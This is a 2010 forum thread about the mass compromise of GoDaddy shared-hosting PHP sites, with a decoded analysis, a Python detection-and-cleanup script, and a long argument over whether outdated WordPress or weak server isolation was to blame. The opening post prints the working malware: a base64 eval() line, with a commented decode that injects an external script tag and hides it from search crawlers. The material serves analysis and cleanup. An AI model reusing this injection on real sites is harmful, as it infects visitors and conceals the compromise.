• 0

GoDaddy Got Hacked Yesterday


Question

I'm sure some of you may be aware of the situation, but as of yesterday (May 1, 2010) at around 2 AM, there was a major hack attempt on GoDaddy. At about 10 AM, GoDaddy tweeted about this matter (see tweet: http://twitter.com/GoDaddy/status/13199601776). The issue has not affected all of their hosting accounts and is still being investigated. The issue is not due to a flaw in WordPress as GoDaddy claims; a friend has a site that only has her own hand-written PHP code and nothing more. My friend is super obsessive about security and knows for a fact her FTP account was not compromised, yet she found all the PHP files on her server to be infected, even those not publicly available.

When you view the source of any of the PHP pages through the browser, you see the following line inserted just before the </body> tag:

<script src="https://kdjkfjskdfjlskdjf.com/kp.php"></script>

When you examine each of the PHP pages, you see this line at the top of all of them (This was the hacked code):

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

When you decode this, it equates to:

// Runs once per request: the $GLOBALS flag stops a second infected include from
// registering another output-buffer callback and injecting the tag twice.
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
    $GLOBALS['mr_no']=1;
    if(!function_exists('mrobh')){
        if(!function_exists('gml')){
            // Returns the tag to inject, but nothing when the User-Agent looks like
            // Googlebot or Yahoo, so search-engine crawlers never see the injection.
            function gml(){
                if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
                    // Decodes to: <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
                    return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");
                }
                return "";
            }
        }
        if(!function_exists('gzdecode')){
            // Fallback gzip decoder for PHP builds without gzdecode(): reads the FLG
            // byte of the gzip header, skips the optional fields it announces
            // (FHCRC=2, FEXTRA=4, FNAME=8, FCOMMENT=16) and inflates what follows.
            function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
                $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); // FLG byte
                $RBE4C4D037E939226F65812885A53DAD9=10; // fixed 10-byte gzip header
                $RA3D52E52A48936CDE0F5356BB08652F2=0;
                if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ // FEXTRA: 2-byte length + data
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                    $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ // FNAME: NUL-terminated
                    $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ // FCOMMENT: NUL-terminated
                    $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ // FHCRC: 2-byte header CRC
                    $RBE4C4D037E939226F65812885A53DAD9+=2;
                }
                $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
                if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
                    // Not gzip after all: pass the buffer through untouched.
                    $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
                }
                return $R034AE2AB94F99CC81B389A1822DA3353;
            }
        }
        // Output-buffer callback: decompresses the buffered page if it was gzipped,
        // then inserts the tag just before </body>, or appends it when there is none.
        function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
            Header('Content-Encoding: none');
            $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
            if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
                return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
            }else{
                return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
            }
        }
        // From here on, everything the page outputs passes through mrobh() before it is sent.
        ob_start('mrobh');
    }
}

I don't really understand what this code exactly does. Can any PHP code experts decipher it?

GoDaddy claimed they will investigate the issue but when my friend called, she found the tech support staff were completely oblivious to the matter.

So, if you are one of the unlucky ones whose server was a part of the attack, please check the bottom of your source code to make sure the <script> tag isn't there. Otherwise contact GoDaddy and complain.

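A file-level check for the infection described in the post above, written in Python as an added example (it is not code from the post or from GoDaddy): it matches the eval(base64_decode(...)) line at the top of a PHP file, decodes both base64 layers so the markers become visible, and strips the injected prefix to recover the original file. The indicator strings are taken from the decoded code and the domain quoted in the post; the infected sample file is constructed.

```python
import base64
import re

# Shape of the one-line injection the post shows at the top of every infected file:
#   <?php /**/ eval(base64_decode("...")); ?>
# PHP swallows one newline after "?>", so the optional newline is matched too and
# removing the whole match restores the original file byte for byte.
INJECTION_RE = re.compile(
    r'<\?php\s*/\*\*/\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);\s*\?>\r?\n?')
# Inside the payload a second base64 literal hides the injected <script> tag.
NESTED_B64_RE = re.compile(r'base64_decode\("([A-Za-z0-9+/=]+)"\)')
# Markers from the decoded payload in the post, plus the domain it quotes.
INDICATORS = ("ob_start('mrobh')", "function gml(", "function mrobh(",
              "kdjkfjskdfjlskdjf.com")


def decode_payload(b64):
    """Decode a base64 literal to text; '' if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("latin-1")
    except ValueError:
        return ""


def scan_php(source):
    """Return (infected, decoded_payload, indicators_hit) for one PHP file's text.
    The file is checked, not the served page, so the payload's User-Agent cloaking
    (no tag for Googlebot/Yahoo) cannot hide the eval() line."""
    m = INJECTION_RE.match(source)
    if not m:
        return False, "", []
    decoded = decode_payload(m.group(1))
    for inner in NESTED_B64_RE.findall(decoded):  # peel the second layer
        decoded += "\n" + decode_payload(inner)
    return True, decoded, [i for i in INDICATORS if i in decoded]


def clean_php(source):
    """Strip the injected prefix; a file that is not infected comes back unchanged."""
    m = INJECTION_RE.match(source)
    return source[m.end():] if m else source


# Constructed sample, not the real payload: the same two-layer structure, much shorter.
_INNER = base64.b64encode(
    b'<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>').decode()
_PAYLOAD = ("if(function_exists('ob_start')){function gml(){return base64_decode(\"%s\");}"
            "function mrobh($b){return $b.gml();}ob_start('mrobh');}" % _INNER)
CLEAN_FILE = '<?php echo "hello"; ?>\n'
INFECTED_FILE = ('<?php /**/ eval(base64_decode("%s"));?>\n'
                 % base64.b64encode(_PAYLOAD.encode()).decode()) + CLEAN_FILE

if __name__ == "__main__":
    found, decoded, hits = scan_php(INFECTED_FILE)
    print("infected:", found, "indicators:", hits)
    print(decoded)
```

Run it over every .php file in the account, not just the public ones, since the post reports files outside the web root were rewritten as well.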

Recommended Posts

  • 0

Just to let you know that my site was infected... I don't have any WordPress installation (not any contact with WordPress).

I think it is a GoDaddy security issue.

Open source projects are commonly used by hackers to trigger this kind of attack, but we have to take into account that there are infected sites without WordPress.

Hope this helps...

Doesn't exactly help, as many claims of people not having WordPress installed popped up, i.e. TonyLock, who for days argued that his two friends did not have WordPress installed. But speaking with GoDaddy, they said every account they looked up had some trace of an outdated version of WordPress, either inactive or active on their account. Now, I'm hearing reports that hackers could easily gain access to an entire server, which could access up to 20-40 accounts on a single server. This could possibly be what GoDaddy is referring to when they said some trace of WordPress was found on users' accounts.

Either way, the coordinated attack only targeted WordPress, afaik, which is very, very likely the only cause for this.


  • 0

Doesn't exactly help, as many claims of people not having WordPress installed popped up, i.e. TonyLock, who for days argued that his two friends did not have WordPress installed. But speaking with GoDaddy, they said every account they looked up had some trace of an outdated version of WordPress, either inactive or active on their account. Now, I'm hearing reports that hackers could easily gain access to an entire server, which could access up to 20-40 accounts on a single server. This could possibly be what GoDaddy is referring to when they said some trace of WordPress was found on users' accounts.

Either way, the coordinated attack only targeted WordPress, afaik, which is very, very likely the only cause for this.

You only need one massively outdated WordPress install on a GoDaddy box to infect the whole thing. "Up to 20-40," more like 100-200, this is a GoDaddy box we're talking about. suPHP has been around a long time; it's about time GoDaddy caught up and stopped blaming third parties.


  • 0

Doesn't exactly help, as many claims of people not having WordPress installed popped up, i.e. TonyLock, who for days argued that his two friends did not have WordPress installed. But speaking with GoDaddy, they said every account they looked up had some trace of an outdated version of WordPress, either inactive or active on their account. Now, I'm hearing reports that hackers could easily gain access to an entire server, which could access up to 20-40 accounts on a single server. This could possibly be what GoDaddy is referring to when they said some trace of WordPress was found on users' accounts.

Either way, the coordinated attack only targeted WordPress, afaik, which is very, very likely the only cause for this.

That's a very warped definition of "some traces... was found on users' accounts" if it's taken to mean that "a user's account had no traces of the files but another user's account who was on the same server did".

And how is it a WordPress problem when one vulnerable install can go out and contaminate everyone else's accounts? This point seems to be universally conceded, and if that's the case, then it's absolutely GoDaddy's fault for not securing their servers and isolating each account properly.


  • 0

I'm just going by the data that GoDaddy told me directly. People can argue all they want about the issue, and pull facts from all over the Internet, but 99% of them are likely to be opinions and theories.

I spoke to GoDaddy's security team directly, over the phone.


  • 0

I'm just going by the data that GoDaddy told me directly. People can argue all they want about the issue, and pull facts from all over the Internet, but 99% of them are likely to be opinions and theories.

I spoke to GoDaddy's security team directly, over the phone.

I understand that, but the information I've read on Neowin - the official information that you've posted - strongly suggests that GoDaddy is at fault here, especially considering that there have not been reports of the same outdated installations on other major web hosts causing this much trouble as well. I don't understand why you're consistently defending them without questioning the official story even a little bit.

If it turns out to be something inherent to the way shared hosts are set up, then we'd have much more problems than simply pointing fingers at everyone.


  • 0

What? What you just posted doesn't actually make sense. You said I'm posting that they are strongly at fault, but I'm defending them?

It's one side or the other. I talked to GoDaddy and cleared up the entire issue; it was an outdated version of WordPress exploit and only attacked shared Linux hosts.

There is nothing really more to the story than that.


  • 0

What? What you just posted doesn't actually make sense. You said I'm posting that they are strongly at fault, but I'm defending them?

It's one side or the other. I talked to GoDaddy and cleared up the entire issue; it was an outdated version of WordPress exploit and only attacked shared Linux hosts.

There is nothing really more to the story than that.

Sorry, I meant that the facts you've posted (i.e. an outdated WP on one account could be exploited to infect other accounts on the same server) suggest they have security problems. I didn't mean that you actually said they were at fault.

It's clear that outdated versions of WP were exploited, but I don't see how that clears up the issue of it being able to infect other hosting accounts.


  • 0

You only need one massively outdated WordPress install on a GoDaddy box to infect the whole thing. "Up to 20-40," more like 100-200, this is a GoDaddy box we're talking about. suPHP has been around a long time; it's about time GoDaddy caught up and stopped blaming third parties.

More like 1000s :whistle: I'm currently on a shared Linux plan and I'm sharing with 6,575 other sites.

But yea, I've been running WordPress since November and I wasn't affected with this recent problem.


  • 0

More like 1000s :whistle: I'm currently on a shared Linux plan and I'm sharing with 6,575 other sites.

But yea, I've been running WordPress since November and I wasn't affected with this recent problem.

To be honest, most of those websites are inactive / using very little to no resources and/or storage space.

How did you find out you're sharing with 6,575 other websites?


  • 0

To be honest, most of those websites are inactive / using very little to no resources and/or storage space.

How did you find out you're sharing with 6,575 other websites?

Inactive accounts are worse than active :3.

I know no one offhand that's hosted on GoDaddy but went on Twitter search and grabbed a random GoDaddy customer's site:

stephenpsmith.com resolves to 208.109.181.42 and only has 162 other sites hosted on the server that account is on.

FAR from that 6,000 other sites claimed above.

So with that being said, x9248, I'm definitely also interested in your server's IP so I can check out to see if it does in fact host that many accounts on a single server :)


  • 0

I'm just going by the data that GoDaddy told me directly. People can argue all they want about the issue, and pull facts from all over the Internet, but 99% of them are likely to be opinions and theories.

I spoke to GoDaddy's security team directly, over the phone.

That's a fine attitude for a reporter, allow me to paraphrase "The accused in this debacle says so, it must be true! No further investigation needed or wanted. You guys don't know what you are talking about."

There's no pulling "facts from all over the internet," I and others posting here work in the business, I find your ignorance of that offensive.


  • 0

It's not like I just pulled a number out my arse, it's what the whois says.

[image: 876786.jpg]

Could it be wrong? Hell I dunno, it's what I'm going by tho.

Wow, I didn't know the numbers were so high.


  • 0

Wow, I didn't know the numbers were so high.

They may dynamically shift sites on the servers based on traffic, resulting in some servers having a rather high number of sites with extremely little traffic, while more active sites could end up with fewer sites per server.


  • 0

Congratulations, you win the internet :rolleyes:

One, my site contains content that is against Neowin's rules. Two, I do not pay for domain privacy and all my information comes up on the whois. Three, it's really none of your business.

Believe what you want, but I stated nothing but facts.

Edit: Actually if you are sooooo intent in proving me wrong, PM me and I'll be happy to give you the domain name.


  • 0

Hi, I am new to this board but I came across this because I too was attacked, and GoDaddy basically directs me to their blog about the WordPress issue. Since my site is on JOOMLA and I have no WordPress files in my system, that link doesn't work for me.

I have told them to update that blog to tell people that it has to do with PHP scripts; that is how the virus is getting around. They still don't believe me.

I told them that this is a server issue. They said they can't find anything on the server to prove it. The support team gives me a general response and doesn't respond to my questions. I give them proof that I am not the only one who got hacked; again they don't believe me. In the end, they said it is my fault the hack happened and not theirs.

So I got upset and wrote an article about this, because I know there are others out there. Since then I have been receiving emails about the same thing. Their support team doesn't care about the customers and tells them to change the password or update wordpress.

Kind of hard to update WordPress when there are people who, like myself, do not use WordPress.

And they keep saying my website is 'escalated'; they have been saying that since Monday and well, it is almost Thursday. What are they doing? Drinking coffee laughing at us customers because we are frustrated?? My site was flagged because of them! I lost business because of them and they said to me "it's not our fault your website got a hack code".

I want to pull my hair out. I hate their general responses. They need to take responsibility for what they did and of course they won't. Because it is 'our fault' it happened.

And another thing, I even showed them proof, this link and others, to prove that everyone so far is saying that this is due to SHARED hosting, i.e. the server.

Of course GoDaddy doesn't believe me. They are getting annoyed by me because I am trying to help them solve this issue quickly by giving them input.

I have words for them right now, I will not say on the internet :)

Hopefully this issue will get solved SOONER rather than later, and fyi GoDaddy peeps, I got rid of the virus; three days later it came back again and I got rid of it again. I am a cpu tech person; I went through it line-by-line for a looong time today as well as Sunday. So I know the codes are gone, but again GoDaddy thinks that I missed code. I might have, but I did look through 6,000K and also checked it with Notepad++, probably what they would do. So I made sure I didn't miss anything.

So again, if it goes away, what the heck is making it come back?!?! Oh right, because their servers are affected! duh!


  • 0

Didn't they also screw over their customers with domain name registration a while ago too?

I think so. But then again, you ask them they will be like "oh no that isn't true. You are the one who messed up" lol
